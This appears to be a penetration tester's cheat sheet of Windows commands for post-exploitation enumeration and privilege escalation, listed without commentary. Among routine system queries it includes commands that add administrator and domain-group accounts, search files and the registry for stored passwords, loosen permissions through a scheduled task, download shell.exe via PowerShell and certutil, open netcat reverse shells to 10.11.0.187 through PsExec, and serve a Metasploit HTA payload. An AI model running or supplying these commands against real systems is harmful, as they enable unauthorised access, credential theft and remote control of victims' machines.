======
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
hostname
ver
echo %username%
whoami /all
SET U All
net user <user> <password> /add
net localgroup administrators /add <user>
net group "HR Admins" myUser /add /domain
ipconfig /all
route print
arp -A
netstat -ano
netstat -ano -p TCP
netsh firewall show state firewall state
netsh firewall show config firewall config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
net view
net users
net user user1
net config
schtasks /query /fo LIST /v
SCHTASKS /Delete /TN SERVERQR /F
SCHTASKS /create /tn SERVERQR /sc DAILY /mo 365 /tr "cmd /c echo,Y|cacls C:\Windows\Fonts*.exe /G everyone:f"
tasklist /SVC
taskkill /PID pid
taskkill /F /IM wscript.exe
net start
sc qc [service_name]
sc queryex state=
DRIVERQUERY
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32PnPSignedDriver | Select-Object DeviceName,DriverVersion,Manufacturer | ?{$.DeviceName -like "XBox"}
dir /a /s /b c:\'.pdf'
dir /a /b c:\windows\kb'
findstr /si password .txt .xml .xls .ini *.infrecursively from current directory
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s | reg query HKCU /f password /t REG_SZ /s | reg query HKLM /v password /t REG_SZ /s
dir \IP.ADD.RE.SS\C$
mountvol
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
dsquery
runas /u:Administrator cmd.exe
| clip
cacls <Program File>
icacls
dir /q
explorer.exe http://10.11.0.187/index.html
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic process where ExecutablePath='C:\Windows\Fonts\svhost.exe' delete
powershell -command "& {&'wget' http://10.11.0.187/shell.exe -OutFile shell.exe}"
PsExec.exe /accepteula -u <user> -p <pass> nc.exe -nv 10.11.0.187 8888 -e cmd.exe
PsExec.exe /accepteula -i -d -s nc.exe -nv 10.11.0.187 8889 -e cmd.exe
Invoke-WebRequest -uri <URL> -OutFile C:\Windows\TEMP\outfile.txt
accesschk.exe /accepteula
accesschk.exe -uws "Everyone" "C:\Program Files"
Autorunsc.exe /accepteula
C:\Users\Public\accesschk64.exe /accepteula *
accesschk.exe -vqp *
accesschk.exe -uwdqs users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwqs users c:*.*
accesschk.exe -uwqs "Authenticated Users" c:*.*
cacls "c:\Program Files" /T | findstr Users
echo 127.0.0.1 my.crypto-pool.info >> %WINDIR%\system32\drivers\etc\hosts
takeown /F file.txt
Start metasploit server (exploit/windows/misc/hta_server). Then, run "mshta.exe //<ip-addr>/random.hta" on the host machine.
C:\Windows\Temp
%USERPROFILE%\AppData\Local\
wmic group list brief
wmic qfe list brief
wmic desktop list brief
wmic cdrom list brief
wmic nic list brief
wmic product get name,version,vendor
wmic process get name,processid
wmic process where processid="1000" call terminate
wmic /node:localhost /user:rambo /password:FirstBl00dPart3 process where name="paint.exe" call terminate
-wmic /node:"servername" /user:"user@domain" /password: "password" RDToggle where ServerName="server name" call SetAllowTSConnections 1
wmic /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV
wmic logicaldisk get name,providername
wmic startup get caption,command,user
wmic /node:remotehost /username:rambo /password:FirstBl00dPart3 service where name="LanManServer" get caption,name,status,started
certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
"C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe" "ms-word:nft|u|https://url/doc.dotm"
autorunsc.exe -x > autoruns.xml
autorunsc.exe -m -v
auditpol /get /category:*
auditpol /set /subcategory:"Logon" /success:enable
net user /domain
net group /domain
$ldapsearch = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$searchstr); $objDomain = New-Object System.DirectoryServices.DirectoryEntry; $ldapsearch.SearchRoot = $objDomain; $ldapsearch.filter="samAccountType=805306368"; $ldapsearch.FindAll();
Get-NetLoggedon -ComputerName foobar
Get-NetSessions -ComputerName dc02